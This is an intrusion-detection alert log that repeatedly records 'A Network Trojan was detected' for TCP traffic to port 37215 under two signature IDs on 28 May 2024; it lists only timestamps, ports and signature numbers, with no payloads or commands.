          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210297
          SID:2835222
          Source Port:54200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230215
          SID:2829579
          Source Port:38590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708867
          SID:2835222
          Source Port:37288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810441
          SID:2835222
          Source Port:35614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653038
          SID:2835222
          Source Port:47910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328636
          SID:2835222
          Source Port:56810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922893
          SID:2835222
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033020
          SID:2835222
          Source Port:35414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812298
          SID:2829579
          Source Port:51760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818624
          SID:2835222
          Source Port:50922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717992
          SID:2835222
          Source Port:51914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227097
          SID:2835222
          Source Port:59288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.854337
          SID:2829579
          Source Port:52938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793559
          SID:2829579
          Source Port:38864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196202
          SID:2835222
          Source Port:44802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943271
          SID:2835222
          Source Port:51720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711252
          SID:2829579
          Source Port:43030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845721
          SID:2835222
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709001
          SID:2835222
          Source Port:52384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225996
          SID:2829579
          Source Port:36750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476450
          SID:2829579
          Source Port:39282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208066
          SID:2829579
          Source Port:40864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536739
          SID:2835222
          Source Port:53536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247171
          SID:2829579
          Source Port:50076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727014
          SID:2835222
          Source Port:39504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435479
          SID:2829579
          Source Port:53858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291589
          SID:2829579
          Source Port:34678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709223
          SID:2835222
          Source Port:35660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689232
          SID:2835222
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497413
          SID:2829579
          Source Port:57898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816053
          SID:2835222
          Source Port:33774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497771
          SID:2835222
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142515
          SID:2835222
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298040
          SID:2835222
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298163
          SID:2835222
          Source Port:51980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482616
          SID:2829579
          Source Port:55898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545888
          SID:2835222
          Source Port:33088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592885
          SID:2835222
          Source Port:45844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064918
          SID:2835222
          Source Port:57140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102987
          SID:2835222
          Source Port:58250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299526
          SID:2835222
          Source Port:59466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744691
          SID:2829579
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530230
          SID:2835222
          Source Port:32828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.322994
          SID:2829579
          Source Port:32956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913358
          SID:2829579
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555041
          SID:2829579
          Source Port:46850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953506
          SID:2835222
          Source Port:43872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756322
          SID:2829579
          Source Port:42828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767965
          SID:2829579
          Source Port:48106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.165643
          SID:2835222
          Source Port:40742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357085
          SID:2835222
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593330
          SID:2829579
          Source Port:59362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770409
          SID:2835222
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178367
          SID:2829579
          Source Port:54608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807654
          SID:2829579
          Source Port:40936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178047
          SID:2835222
          Source Port:46602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.951924
          SID:2835222
          Source Port:54108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111276
          SID:2829579
          Source Port:40598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797182
          SID:2829579
          Source Port:51294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537722
          SID:2835222
          Source Port:35930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114583
          SID:2829579
          Source Port:52516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402598
          SID:2829579
          Source Port:42580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.049058
          SID:2835222
          Source Port:35734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932650
          SID:2835222
          Source Port:45440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547056
          SID:2829579
          Source Port:45768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549332
          SID:2835222
          Source Port:47570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806864
          SID:2829579
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176699
          SID:2829579
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.220652
          SID:2835222
          Source Port:43432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039659
          SID:2835222
          Source Port:55486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300994
          SID:2829579
          Source Port:43262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922546
          SID:2835222
          Source Port:44786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039106
          SID:2835222
          Source Port:45876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739222
          SID:2835222
          Source Port:53484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922934
          SID:2835222
          Source Port:51838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.421985
          SID:2829579
          Source Port:59716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709051
          SID:2829579
          Source Port:45406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893832
          SID:2835222
          Source Port:57482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182942
          SID:2829579
          Source Port:43664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231739
          SID:2829579
          Source Port:33902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496724
          SID:2835222
          Source Port:45424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811711
          SID:2835222
          Source Port:52112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.823173
          SID:2829579
          Source Port:44710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276842
          SID:2829579
          Source Port:58468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225860
          SID:2835222
          Source Port:57146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272781
          SID:2829579
          Source Port:51024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551783
          SID:2835222
          Source Port:52878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285000
          SID:2835222
          Source Port:49122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465096
          SID:2829579
          Source Port:49480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940990
          SID:2835222
          Source Port:51440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530064
          SID:2835222
          Source Port:45892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841240
          SID:2835222
          Source Port:52352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552402
          SID:2829579
          Source Port:56052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332715
          SID:2829579
          Source Port:42016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892675
          SID:2835222
          Source Port:57988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685513
          SID:2835222
          Source Port:60558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838583
          SID:2829579
          Source Port:39108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299975
          SID:2835222
          Source Port:32894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111291
          SID:2829579
          Source Port:41968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241342
          SID:2829579
          Source Port:53750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168454
          SID:2829579
          Source Port:40662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659833
          SID:2835222
          Source Port:58784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338569
          SID:2829579
          Source Port:37350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561083
          SID:2829579
          Source Port:41018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223561
          SID:2835222
          Source Port:43720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853346
          SID:2835222
          Source Port:33824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125627
          SID:2835222
          Source Port:52578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845479
          SID:2835222
          Source Port:58940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338020
          SID:2835222
          Source Port:57148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337447
          SID:2835222
          Source Port:34454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.690352
          SID:2835222
          Source Port:46250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216723
          SID:2829579
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938500
          SID:2835222
          Source Port:52878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206429
          SID:2835222
          Source Port:56982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665380
          SID:2829579
          Source Port:35812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117224
          SID:2835222
          Source Port:49612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909209
          SID:2829579
          Source Port:40832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978837
          SID:2829579
          Source Port:41160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284185
          SID:2829579
          Source Port:41112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764545
          SID:2835222
          Source Port:38350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961522
          SID:2835222
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528898
          SID:2835222
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485657
          SID:2829579
          Source Port:39790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600620
          SID:2835222
          Source Port:47004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400936
          SID:2829579
          Source Port:44000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678572
          SID:2829579
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156322
          SID:2829579
          Source Port:42022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177212
          SID:2829579
          Source Port:55792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.746024
          SID:2835222
          Source Port:43214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588855
          SID:2829579
          Source Port:35894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681108
          SID:2835222
          Source Port:35132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931006
          SID:2835222
          Source Port:44384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299647
          SID:2835222
          Source Port:57792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993090
          SID:2835222
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797130
          SID:2829579
          Source Port:55544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430299
          SID:2835222
          Source Port:40234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513737
          SID:2835222
          Source Port:57534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849176
          SID:2829579
          Source Port:48386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215028
          SID:2829579
          Source Port:43340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484382
          SID:2835222
          Source Port:40712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631805
          SID:2829579
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357113
          SID:2829579
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156819
          SID:2829579
          Source Port:37268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125842
          SID:2835222
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066549
          SID:2835222
          Source Port:42886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339693
          SID:2835222
          Source Port:53522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168401
          SID:2835222
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272030
          SID:2829579
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181252
          SID:2835222
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600626
          SID:2829579
          Source Port:42986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549414
          SID:2829579
          Source Port:51468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659940
          SID:2829579
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496778
          SID:2829579
          Source Port:59226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102250
          SID:2829579
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214694
          SID:2835222
          Source Port:54100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938607
          SID:2829579
          Source Port:58120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710105
          SID:2829579
          Source Port:37990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102368
          SID:2829579
          Source Port:38888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.703928
          SID:2835222
          Source Port:41268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964377
          SID:2835222
          Source Port:33616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297686
          SID:2829579
          Source Port:48160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847040
          SID:2829579
          Source Port:51870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924086
          SID:2829579
          Source Port:44972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209357
          SID:2829579
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214155
          SID:2829579
          Source Port:46052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486506
          SID:2829579
          Source Port:37594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.206881
          SID:2829579
          Source Port:39000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147671
          SID:2829579
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048664
          SID:2829579
          Source Port:41356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295117
          SID:2829579
          Source Port:50292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548040
          SID:2829579
          Source Port:33150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174069
          SID:2835222
          Source Port:47824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102958
          SID:2829579
          Source Port:55990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755967
          SID:2835222
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316928
          SID:2835222
          Source Port:44290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142036
          SID:2829579
          Source Port:48070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161738
          SID:2829579
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.238998
          SID:2829579
          Source Port:45434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549416
          SID:2835222
          Source Port:58414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614160
          SID:2829579
          Source Port:60180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160925
          SID:2829579
          Source Port:48822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093700
          SID:2835222
          Source Port:44316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497196
          SID:2829579
          Source Port:54754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147524
          SID:2835222
          Source Port:58214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887430
          SID:2829579
          Source Port:43312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841328
          SID:2829579
          Source Port:49266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793363
          SID:2829579
          Source Port:36978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113030
          SID:2829579
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352530
          SID:2829579
          Source Port:56768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089730
          SID:2829579
          Source Port:42386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858805
          SID:2829579
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357067
          SID:2829579
          Source Port:39848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272276
          SID:2829579
          Source Port:59524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111708
          SID:2835222
          Source Port:48930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839717
          SID:2829579
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949108
          SID:2829579
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734366
          SID:2835222
          Source Port:42708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
